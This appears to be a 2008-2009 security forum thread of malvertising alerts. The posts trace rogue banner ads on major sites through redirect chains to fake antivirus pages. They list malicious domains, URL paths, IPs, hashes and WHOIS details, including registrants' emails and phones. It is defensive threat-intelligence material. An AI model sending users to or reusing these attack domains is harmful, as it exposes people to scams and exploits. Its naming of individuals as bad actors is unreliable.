Rogue Banner Ads [extrabanner.com [Sept 20]

The latest malware threats from across the security forums

Moderators: Admin Team, Moderators

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads

Postby TeMerc » Wed Nov 19, 2008 8:23 pm

ALERT: Two malvertizements seen at Skydrive and Hotmail...
Kimberley saw the first one, a malvertizement featuring perfectmatch.com.

I have discovered another malvertizement featuring IMIN - we have seen this advert several times in recent days in different places.

Details of hijack:

IMIN malvertizement undetectable using adopstools
http://www.adopstools.com/index.asp?pag ... 37aZeMUVbT

Encrypted dynamic text in use

Hash: 11c8f432a9e70c56a171ddfa9df43a3a

Refers victims user to this URL (SWF disguised as GIF)
optimizedby.net/__utm.gif?<<snipped>>

Scans malicious at adopstools
http://www.adopstools.com/index.asp?pag ... 21nJm6q02M

Hash: d730fba801a56311f9cf73587826821a

Leads victim fraudware domains, including windows-scannercenter.com/?id=<<snipped>>
0-= More @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [On SkyDrive & Hotmail [Nov 20]

Postby TeMerc » Thu Nov 20, 2008 3:36 pm

WARNING: allrecipes.com - Rhapsody MP3 Store
Today, 02:36 PM

A new way of redirecting people to fake online scanners is occuring at All Recipes aka allrecipes.com. A jpg image featuring Rhapsody MP3 Store is being displayed and people are redirected to Antivirus 2009.

Campaign.
    www.prolinar.com/?id=10810121545881960
    juwiline.com/?id=10810121545881960
    http://www.lynix-star.com/banners-db/Rhapsody/Rhapsody_728x90_1.jpg
    juwiline.com/stats/?id=10810121545881960
    juwiline.com/includes.js
    clicksoverview.com/soft.php?aid=
  • &d=6&product=XPA&refer=
  • antivirusdefense.com/2009/1/en/freescan.php?id=
0-= Complte Detailed Analysis @ Bluetack Internet Security Solutions
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [On SkyDrive & Hotmail [Nov 20]

Postby TeMerc » Sun Nov 23, 2008 6:20 pm

ALERT: Malvertizement at Expedia.com

Details here:
http://www.mikeonads.com/2008/11/23/mal ... xpediacom/

It looks identical to the malvert at allrecipes.com discussed here:
http://www.bluetack.co.uk/forums/index. ... &p=89945&#

Some of the same domains are used, prolinar.com and clicksoverview.com. The fraudware domain is also the same, antivirusdefense.com.

prolinar.com:
ICANN Registrar: ESTDOMAINS
Created: 18 November 2008
NS57.1AND1.COM
NS58.1AND1.COM
IP: 74.208.131.124 - United States - 1&1 Internet Inc
Registrant: Thomas Schultz (ts8317ATgooglemail.com)

vernariostar.com:
ICANN Registrar: NETFIRMS INC
Created: 20 November 2008
NS1.NETFIRMS.COM
NS2.NETFIRMS.COM
IP: 38.113.185.172 - United States - Performance Systems International Inc
Registrant: No WHOIS details

triesto.com:
ICANN Registrar: ESTDOMAINS INC
Created: 20 November 2008
NS57.1AND1.COM
NS58.1AND1.COM
IP: 74.208.131.124 - United States - 1&1 Internet Inc
Registrant: Andy Borman, Copress (andybormATgooglemail.com)

0-= Continued Details @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [On Expedia[Nov 23]

Postby TeMerc » Tue Dec 09, 2008 6:22 pm

ALERT: new malvertizement featuring "Sell Your Home"
Detectable by Adopstools:
http://www.adopstools.net/index.asp?pag ... G889AVz3Tf

Malvertizement touches:

2layerads.net/_stat.gif?src=<<snipped>>

You may note that the URL seems to be downloading a "GIF". It is not. It is downloading a "SWF" (using the same trickery that has been seen with _utm.gif which also proved to be a SWF).

_stat.gif (which is a SWF) is detectable via adopstools:

http://www.adopstools.net/index.asp?pag ... zj1N328997

So, who are 2layerads.net? Well, for starters they have been implicated in malvertizement incidents in the past.

Back when we were reporting on adtechie and its activities, 2layerads.net had an open WHOIS and was hosted by Cernel at 64.28.187.23:

2layerads.net as at 15 November 2008 - 64.28.187.23

Updated Date: 11-nov-2008
Creation Date: 24-mar-2008
Registrar: ESTDOMAINS, INC.
Name Server: NS.2LAYERADS.NET
Name Server: NS2.2LAYERADS.NET
0-= Continued @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [On Expedia[Nov 23]

Postby TeMerc » Tue Dec 09, 2008 6:24 pm

ALERT: treat all content from Olympic Media (olympicmedia.net) with extreme caution
Olympic Media has been caught distributing malvertizing ... again (thanks to Kimberley for the heads up).

Why do I say again? Because a usatoday representative posted to my blog back in September claiming that Olympic Media had sold them a malvertizement.

Anyway, back to present day. This time Olympic Media are distributing a cyberipod malvert.

When the advert is run, it reaches out to two domains - freegreenstats.com and statisticsmanager.com.

statisticsmanager.com drops a cookie for adnetserver.com before leading us to onlinestatsmanager.com. From there we end up at online-info-clicks.com, is which the first URL that exposes the victim to fraudware. online-info-clicks.com redirects the victim to anti-virus-live-scan.com.
0-= Continued @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [On Expedia[Nov 23]

Postby TeMerc » Tue Dec 09, 2008 6:28 pm

Malvertizing at variety.com?
Cite: http://www.google.com/support/forum/p/W ... b298&hl=en

I disagree with the theory being espoused by some in that thread (that the site is hacked and/or htaccess has been manipulated). This is because:

the thread author is complaining that the redirects are occurring as he browses the site
it is not affecting anybody else who has posted to the thread
Such symptoms lead me to believe that there is malvertizing being displayed somewhere on the site - I agree with jwp_var. It is interesting that the behavior only seems to affect Firefox...

The complained of URL, proweb-info.com/soft.php?aid=075676&d=1&product=XPA&refer=dc77b3921 is definitely bad, leading the victim to the fraudware site advancedproscan.com.
0-= Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [variety.com/olympicmedia.com[Dec 12]

Postby TeMerc » Wed Dec 10, 2008 10:44 pm

ALERT: malvertizement featuring Best Western
Published Thursday, December 11, 2008 10:58 AM by sandi

Sites involved:
    onlinestatsmanager.com
    protected-web-space.com
    scan.freeantispyware-scanner.com
    system-scanner.org
0-= Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [Best Western[Dec 13]

Postby TeMerc » Sat Dec 13, 2008 8:09 am

ALERT: Treat all content from Servedad with extreme caution

I have said it before, but I'll say it again - PLEASE TREAT ALL CONTENT FROM SERVEDAD WITH EXTREME CAUTION!!

They look innocent enough *today* if you check their WHOIS. The ICANN Registrar is listed as Regtime, the domain created in June 2007, Registrar is a "Tom Reber" (tomasreber@yahoo.com) and the name is not associated with any other domains, but I can tell you without a doubt that Servedad are bad.

Putting aside the fact that they have been caught doing bad things before, more than once, it becomes obvious that they should be treated with caution when we look at the history of the domain. Back in May of this year, these were the WHOIS details:

ICANN Registrar: Estdomains
Name servers: managedns4.estboxes.com (and managedns.3, .2 and .1)

In May, other WHOIS details were hidden behind privacyprotect, but then the domain lost its protection and a "Javier Vega" (softjoda@yahoo.com) was exposed (yes, the name and email address are familiar).

0-= Continued @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [Servedad[Dec 13]

Postby TeMerc » Sun Dec 14, 2008 11:16 pm

safepaymentsonline.com - down the rabbit hole we go...

I have been taking a look at the site safepaymentsonline.com because a report of naughtiness was received. Here is what I found:

Current WHOIS:

Code: Select all

ICANN Registrar: TLDS, LLC DBA SRSPLUS
Domain created: 8 April 2008
NS1, 2, 3, 4.SAFEPAYMENTSONLINE.COM
IP: 216.195.56.148 (Oregon - Portland - Aps Telecom)
Registrant: Markus Simpson (further details hidden behind SRSPlus Private Registration)
Sharing IP with 29 domains:
    1softwarespot.com,
    Adult-billing.com
    Bestsoftclub.com
    Billhlp.com
    Billingcenteronline.com
    Billinghost.net
    Billingintegrator.com
    Billingmill.com
    Billingserviceonline.com
    Billingsquad.net
    Billinternet.com
    Billsvc.com
    Customerhlp.com
    Dopaymentsonline.com
    Ebillingcenter.com
    Fantazybill.com
    Interbills.com
    Justnetbilling.net
    Legalbillingsystems.com
    Mainbillingcenter.com
    Megafixer.com
    Orderhlp.com
    Paymentbit.com
    Paymentbit.net
    Paymentforge.com
    Safepaymentsonline.com
    Softwbill.com
    Spankyhosting.com
    Support-wizard.com
    Truebillingservices.com
0-= Continued Detailed Analysis @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [safepaymentsonline.com[Dec 15]

Postby TeMerc » Sun Jan 04, 2009 7:48 pm

ALERT: traffichunter.net and traffichunters.net – spot the similarities to Olympic Media

I think it is fair to say that all content from traffichunter.net and traffichunters.net should be treated with extreme caution.

First of all, I received an email warning me that there are remarkable similarities between the Olympic Media web site and the Traffic Hunter(s) web site (and we already know that Olympic Media has been implicated in the distribution of malvertizements). There are screenshots evidencing the remarkable similarities at the end of this article.

Secondly, my correspondent described the references supplied by Traffic Hunters as being “fishy”.

Thirdly, the WHOIS details for traffichunter.net and traffichunters.net raise suspicion – traffichunter.net and traffichunters.net share IP address but have completely different WHOIS details. Not only that, traffichunters.net has WHOIS details identical to another domain that hosted (hosts?) a web page which tries to infect computers via various security exploits (cite: bluetack.co.uk URL below)

Traffic Hunter’s office is apparently in Poland - Nowowiejska Str. 12, Room 36, Warsaw, Poland to be exact.

traffichunter.net
ICANN Registrar: NAME.COM LLC
Created: 25 September 2008
NS1.TRAFFICHUNTER.COM
NS2.TRAFFICHUNTER.COM

IP: 72.232.107.19 - New York, Layered Technologies Inc

Registrant: Jeann Covergale Petroleum (jeann.petroleum@yahoo.com)
339 St Paul Street, Kamloops, Vancouver BC
Note: It is worth noting that the Coast Canadian Inn is located at the address claimed by the traffichunter.net Registrant

0-= Continued @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [traffichunters.net\.com[Jan 5]

Postby TeMerc » Wed Jan 14, 2009 10:35 pm

Glowing brain malvertizement – and, once again, we find DIRECTI

Adopstools results:
http://www.adopstools.net/index.asp?pag ... ay36mabrK0

Touches the domain adclickmate.net:
Registrar: DIRECTI (yet again)
Created 24 March 2008
NS1.ADCLICKMATE.NET
NS2.ADCLICKMATE.NET

IP: 212.95.37.133 - Germany, Netdirekt
WHOIS hidden behind privacy protect

Domain originally registered via ESTDOMAINS - WHOIS protection temporary removed around late August 2008, which revealed:

Code: Select all

Domain Corp.
Jacob Tua (jackyouthere@gmail.com)
Maltiskam 12-67
Belgrade
Belgrade, 11008
RS
Tel: +381.113114094

Later changing to:

Domain Names copr.
markhaagland@gmail.com
Tallin
Harjumaa, 13514
EE
Tel. +37.26201114
0-= Continued @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [DIRECTI[Jan 15]

Postby TeMerc » Fri Jan 16, 2009 10:53 am

ALERT: Please treat all content from topstarmedia.net and osmedlin.com with extreme caution
- do we find DIRECTI? Yes we do!
I received an email alert today reporting that topstarmedia.net is supplying JavaScript code for advertising campaigns as follows:

osmedlin.com/?id=<<removed>>

To quote my correspondent, topstarmedia’s approach had "ll the hallmarks- 5 figure budget, launch on a Friday, immediately, etc."

topstarmedia.net
ICANN Registrar: Oneandone
Created: 31 August 2008
nserver: ns2.3fn.net 216.195.48.10

nserver: dns346.3fn.net 216.195.56.230

IP: 216.195.57.52 - Oregon - Portland - Aps Telecom

WHOIS hidden behind "Private Registration"

According to Google Maps, topstarmedia.net shares its stated address (518 W 6th St, Los Angeles, CA 90014 United States) with a pizza shop and locksmith :-)

0-= Continued @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [DIRECTI[Jan 15]

Postby TeMerc » Mon Feb 02, 2009 12:13 am

Olympic Media are still active
I’ve warned about Olympic Media several times – they continue to be active.

The latest reports indicate they are claiming to be operating out of Canada and are supplying javascript code referring to admin.securityclick.net.

Other domains being used are onlinepromostats.com and admediastats.com.
0-= Continued @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [Olympic Media[Feb 2]

Postby TeMerc » Wed Mar 11, 2009 12:10 am

ALERT: New malvertizement featuring Bausch & Lomb Softlens contact lenses
I have seen multiple, visually identical, versions of the malvertizement shown above, one of which has revealed a new name and domains. Please be on the look-out.

One sample that I received today is effectively neutralized because the malvertizement hits the domains of-ficialstat.com and securityclick.net, both of which are not resolving.

securityclick.net is a "Serg Moons" domain, which is currently "on hold" (aka locked) :o) The domain is no longer resolving, but its last IP address was 212.117.165.128.

The next sample I examined hits the following domains - cosmotraf.net and pleaselinkmeto.com - two domains that I have not encountered before. This campaign is live.

Once the redirect is triggered we hit a URL at traff-direct.com. We are then redirected to go-uniq.com before we hit the fraudware domains removespywarethreats.com or desktoprepairpage.com or pcantimalwaresolution.com.
0-= Continued @ Spywware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [Olympic Media[Feb 2]

Postby TeMerc » Fri Mar 13, 2009 1:04 am

ALERT: please treat the domains hit-detect.com and statsnclick.com with extreme caution

Both are new domains associated with the Registrant "Gabriel Jenks". Regular readers of my blog will know that "Gabriel Jenks" is a name associated with several malvertizement related domains in recent times, including measurehits.com and statisticsishere.com

Web sites in the same IP range: addded.com, banner-count.com, lineacount.com, lineweather.com, mypersonalhttp.com, tangoing.info, tinnily.info, unmarine.info, warwork.info, wovens.info.
0-= Continued @ Spyware Sucks
=======================================================================
Alert: please treat all content from hitoptimist.com with extreme caution
Seen in association with malvertizing incidents - measurehits.com used in same malvertizing campaigns.

hostnames sharing ip with a-records:
    cosmotraf.net
    download.pcprivacycleaner.com
    download.powerfulvirusremover2008.com
    static.88-198-8-15.clients.your-server.de
    sw.effectiveload.com
    ydmstats.com
0-= Continued @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [Olympic Media[Feb 2]

Postby TeMerc » Tue Apr 14, 2009 11:13 am

ALERT: Please treat advertising content from checkm8.com with extreme caution
Reported to checkm8.com over 9 hours ago.

Checkm8.com is serving several malicious advertisements that hijack web site visitors and redirect them to various fraudware web sites as follows.

logiagroup.checkm8.com/data/478089/HP_728x90.swf
logiagroup.checkm8.com/data/478091/HP_468x60.swf
logiagroup.checkm8.com/data/479231/HP_300x250.swf
logiagroup.checkm8.com/data/479237/HP_728x90.swf

SWF analysis via Adopstools:

adopstools.com/index.asp?section=quicklink&id=950rk4Ik9bh3WaWF
adopstools.com/index.asp?section=quicklink&id=I7c2TVDD2X6zf9I7
adopstools.com/index.asp?section=quicklink&id=1bB5k3GOLOvb5iSN
adopstools.com/index.asp?section=quicklink&id=aD6g49HnzyF8anGV

Further information:

logiagroup.checkm8.com/data/478089/HP_728x90.swf touches the following URLs:

hitoptimist.com/c/index.php?id=<<redacted>>
measurehits.com/?cmpid=<<redacted>>

logiagroup.checkm8.com/data/478091/HP_468x60.swf touches the following URLs:

hit-detect.com/c/index.php?id=<<redacted>>
measurehits.com/?cmpid=<<redacted>>

logiagroup.checkm8.com/data/479231/HP_300x250.swf touches the following URLs:

hitoptimist.com/c/index.php?id=<<redacted>>
measurehits.com/?cmpid=<<redacted>>

logiagroup.checkm8.com/data/479237/HP_728x90.swf touches the following URLs:

hitoptimist.com/c/index.php?id=<<redacted>>
measurehits.com/?cmpid=<<redacted>>

Domain details:

hitoptimist.com:
ICANN Registrar - COMMUNIGAL COMMUNICATIONS LTD
Created 10 March 2009
DNS1.COMMUNIGAL.NET
DNS2.COMMUNIGAL.NET

IP: 88.198.8.15 - Bayern - Gunzenhausen - Hetzner-rz-nbg-net

Sharing IP address with cosmotraf.net, hit-detect.com, statisticsishere.com and ydmstats.com (all domains should be treated with extreme caution)
0-= Continuned @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [Olympic Media[Feb 2]

Postby TeMerc » Thu Apr 16, 2009 12:52 am

ALERT: Please treat advertising from beyond.com with extreme caution
Note: the malicious SWF has been reported to beyond.com.

Beyond.com is displaying a malicious advertisement with this URL:
ads.beyond.com/banners/jobfox_468x60.swf

Eventually the victim ends up at one of several fraudware URLs, including:
    removespywarethreats.com/<<redacted>>
    desktoprepairpackage.com/<<redacted>>
    pcantimalwaresolution.com/<<redacted>>
    total-virusprotection.com/<<redacted>>
    offer-provider.com/<<redacted>>
0-= Continued @ Spyware Sucks Blog
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [beyond.com [Apr ]

Postby TeMerc » Fri Apr 17, 2009 11:46 pm

ALERT: Please treat advertising from letssingit.com with extreme caution
Note, the malvertizement was reported to “kraz”, who is apparently responsible for advertising on the letssingit.com web site, a couple of days ago via the "Advertise on letssingit” contact form, to no avail.

letssingit.com is hosting a malicious advertising featuring SWATCH as per this URL:
includes.letssingit.com/ads/SWATCH300x250.swf

Adopstools check:
http://www.adopstools.net/index.asp?sec ... VapP174q1A

The malvert hits some well known bad domains, being cosmotraf.net and welovesandi.com.

From there we bounce through various domains, including crustat.com, olinredr2.com, truconv.com, top-name.cn, pyani.com before ending up at one of several fraudware sites including offer-provider.com and total-virusprotection.com.
0-= Spyware Sucks Blog
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [beyond.com [Apr ]

Postby TeMerc » Wed Apr 22, 2009 11:10 am

ALERT: Please treat advertising at clevescene.net with extreme caution
Same old same old. A rhapsody advertisement. Reported to clevescene

URL of malvertizement:
72.167.208.179/adserver/www/images/rhapsody728x90.swf

Adopstools results confirming malicious code:
http://www.adopstools.com/index.asp?sec ... r1bK1W3pv3

URLs encountered:
hitoptimist.com/crossdomain.xml

and:
hitoptimist.com/c/index.php?<<redacted>>

as well as:
statsnclick.com/?cmpid=<<redacted>>

From there we end up at:
crustat.com/ts/in.cgi?<<redacted>>

Before ending up at:
pnfzetnax.net/pro/uspremorse/

Before ending up at the fraudware site:
78.47.132.220/cr/adv/142/index.html
0-= Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [beyond.com [Apr ]

Postby TeMerc » Thu Apr 23, 2009 4:32 pm

PLEASE TREAT ALL CONTENT FROM PERFECT-BANNER.COM WITH EXTREME CAUTION
Adopstools scan results:
http://www.adopstools.net/index.asp?sec ... vFRC85pkp7

Malvertizement host:
perfect-banner.com

Hits the domains statcluster.com and enjoyspringtime.com

From there to crustat.com, pnfzetnax.net (or justwebsecurity.com), then to 78.47.132.220.

-----

perfectbanner.com


ICANN Registrar: ENOM, INC.
Created 10 March 2009
NS1.PERFECT-BANNER.COM
NS2.PERFECT-BANNER.COM
NS3.PERFECT-BANNER.COM
NS4.PERFECT-BANNER.COM

IP: 89.149.244.137 - Hessen, Frankfurt Am Main, Netdirekt E.k

Shares IP with one other site, being 4netbanners.com - please treat the domain 4netbanners.com with extreme caution
0-= Continued @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [PERFECT-BANNER.COM [Apr 23]

Postby TeMerc » Tue Apr 28, 2009 12:17 am

Further information regarding the malvertizements touting ebay discovered at perezhilton.com

The malvertizement redirects victims to various fraudware/scareware products via several redirects (some of the URLs change at random – victims don’t hit all of the domains listed below).

These are the URLs that are hit by the malvertizement – we have seen all of them before:
    statcluster.com/crossdomain.xml
    statcluster.com/c/index.php?id<<redacted>>
    crustat.com/ts/in.cgi?<<redacted>>
    olinredr2.com/?accs=<<redacted>>
    pyani.com/in.cgi?<<redacted>>
    offer-provider.com/<<redacted>>
    truconv.com/<<redacted>>
    justwebsecurity.com/<<redacted>>
Final destinations:
offer-provider.com is a fraudware domain touting fake security software under various names such as "SpywareRemover" and "VirusRemover2009" and "AntiSpywareSolution 2009".

trueconv leads to the fraudware total-virusprotection.com.

justwebsecurity.com leads to a fake "System Security" scanning page
0-= SpywareSucks
=======================================================

More information about the malvertizements that appeared on guardian.co.uk and electronicsnews.com.au
There are two malvertizements that I highlighted, being:

m1.au.2mdn.net/1949664/hp_300x250.swf
m1.emea.2mdn.net/989589/hp_728x90.swf

The 300x250 malvert touches hit-detect.com and measurehits.com.
The 728x90 malvert touches ydmstats.com and measurehits.com.

Redirects:
We go from measurehits.com to crustat.com.

From there we go to one of several different domains:
    olinredr2.com/<<redacted>>
    truconv.com/<<redacted>>
    free-webscaners.com/<<redacted>> <--- fraudware domain
If a victim is redirected to olinredr2.com then they end up at pyani.com,then offer-provider.com. offer-provider.com is a fraudware domain touting fake security software under various names such as "SpywareRemover" and "VirusRemover2009" and "AntiSpywareSolution 2009".

If a victim is redirected to truconv.com then they end up at total-virusprotection.com, another fraudware domain.
0-= Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [PERFECT-BANNER.COM [Apr 23]

Postby TeMerc » Thu Apr 30, 2009 10:53 am

ALERT: Malvertizement featuring Crawler
Same old same old. The malvertizement hits the domains statcluster.com and enjoyspringtime.com (both domains have been mentioned on this blog several times).

The Adopstools results make it obvious that there is something suspicious:
http://www.adopstools.net/index.asp?sec ... 36S016WwBW

From statcluster.com and enjoyspringtime.com we end up at crustat.com then on to either free-webscaners.com or truconv.com or olinredr2.com

From olinredr2.com to pyani.com to offer-provider.com

From trueconv.com to total-virusprotection.com
0-= Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [CRAWLER[Apr 30]

Postby TeMerc » Mon May 04, 2009 11:36 pm

Malvertizments Impersonating Classmates.com

Reported by Kimberley:
http://www.bluetack.co.uk/forums/index. ... st&p=91839

The malvertizements are very familiar, yes?

Now, we already know that a known bad actor, yourdirectmedia, has supplied "Classmatesmedia, Rick Harris, 619 949 8952" as a referee. We also suspect (I have not had this independently confirmed) that classmatesmedia does not directly sells advertising - rather, I believe that United Online Advertising Solutions is responsible for that chore (uolmediagroup.com).

How much do you want to bet that somebody impersonating classmates.com, or falsely claiming to represent them, is responsible for these malvertizements.
0-= Continued @ Spyware Sucks
================================================================
0-= Updated
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [CRAWLER[Apr 30]

Postby TeMerc » Wed May 20, 2009 11:39 pm

ALERT: Please treat advertising from Gilmours Media (gilmoursmedia.com) with extreme caution

They have been caught distributing malvertizing.

It should be noted that gilmoursmedia.com was originally registered via the infamous ESTDOMAINS, to a "Jacob Tua" of Maltiskam 12-67, Belgrade, 11008, telephone +381.113114094.

More importantly, the email address for "Jacob Tua" was "jackyouthere@gmail.com". See this Apple discussion forum conversation about a the clipboard hijacking problem – the same clipboard hijacking problem that led to Adobe changing the way Flash behaves:
http://discussions.apple.com/thread.jsp ... ID=7768848

The domain being copied to clipboard via the Flash exploit was "windowsxp-privacy.net", which just so happened to be registered to, you guessed it, jackyouthere@gmail.com!! This information was posted to the discussion thread on 20 August 2008.
0-= Continued @ Spyware Sucks Blog
===============================================================
3 malvertizements

All created using, we think, Fuse – all use the encrypted-code-as-dynamic-text trick.

Malvertizement 1 (reported by Greg Feezel) and seen on Fox Audience Network:
Hits bigstat.net
ICANN Registrar: REGTIME LTD
Created 18 February 2009
NS1.NAMESELF.COM
NS2.NAMESELF.COM

IP: 212.95.32.166 - Berlin, Netdirekt

Shares IP with greatstat.com

Registrant - bigstat.net and greatstat.com
Anemari Rotko (ranemari@yahoo.com)
Tulskaya, 247/14
Moscow, 109029, Russia
+7 495 364 9627

0-= Continued @ Spyware Sucks Blog
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [Gilmours Media [May 21]

Postby TeMerc » Mon Jul 13, 2009 10:43 am

ALERT: Please treat content from antventure.com, yellowlinebanner.com, redhousebanner.com, t.banner0709.com and knocklis.com with extreme caution

Normally when I write about malvertizing on this blog, the “goal” of the malvertizement has been to expose victims to fake security software (aka fraudware). In one case, the “goal” was to expose the victim to a pornographic web site (complete with streaming video and sound on the opening page – mlb.com was hit by that one).

Today I saw a malvertizement that did not expose victims to fake security software, or unwanted pornography. Instead, it exposed victims to a web site that tried, via various security exploits, to infect computers.

If a victim is exposed to the dangerous content via the malvertizing discovered today, a malicious PDF is downloaded, which takes advantage of two exploits affecting Adobe Acrobat and Adobe Reader (CVE-2008-2992 and CVE-2009-0927). These vulnerabilities are used to try to download even more malicious software via a web page.

0-= Continued @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [Gilmours Media [May 21]

Postby TeMerc » Tue Jul 14, 2009 12:33 am

ALERT: malvertizement featuring “Blue Nile”

The SWF advertisement pictured above retrieves content from the domain adburau.net. That content is yet another SWF. At time of writing, the SWF downloaded from the domain adburau.net was a single frame SWF with no images, or shapes, or fonts, or texts, no sounds, or videos, or buttons, or sprites, or scripts.

Let’s take a close look at adburau.net – we dig up some interesting information.

adburau.net
ICANN Registrar: DIRECTI
Created: 21 September 2008
NS1.ADBURAU.NET
NS2.ADBURAU.NET

IP: 212.95.37.133 - Netdirekt, E.k

Registrant:
Al Jabber
